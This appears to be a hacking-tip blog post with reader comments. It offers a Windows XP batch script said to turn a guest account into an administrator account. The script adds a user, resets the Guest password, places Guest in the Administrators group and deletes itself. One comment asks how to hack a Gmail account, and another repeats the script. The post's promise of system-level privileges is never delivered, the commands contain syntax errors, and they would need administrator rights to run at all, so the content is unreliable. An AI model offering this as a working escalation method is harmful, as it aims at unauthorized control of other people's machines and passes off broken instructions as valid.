Turn Windows Xp Guest Account to Administrator Account

Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account.To convert guest account to administrator account first of all

Copy this to notepad

echo off
title Please wait…
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

Save the file as “Guest2admin.bat”
then u can double click the file to execute or run in the cmd.

This turns your guest account into administrotor account…..

3 thoughts on “Turn Windows Xp Guest Account to Administrator Account
  1. name

    really great sites, thank you,

  2. anuj

    sir,
    please tell me how to hack gmail id without any software and safely.

  3. ankur

    Turn Windows Xp Guest Account to Administrator Account
    echo off
    title Please wait…
    cls
    net user add Username Password /add
    net user localgroup Administrators Username /add
    net user Guest 420 /active:yes
    net localgroup Guests Guest /DELETE
    net localgroup Administrators Guest /add
    del %0

    i add new user account name sonu
    then in this command file i changed guest to sonu everywhere sonu account turn to adminstrator but password protected i don’s know password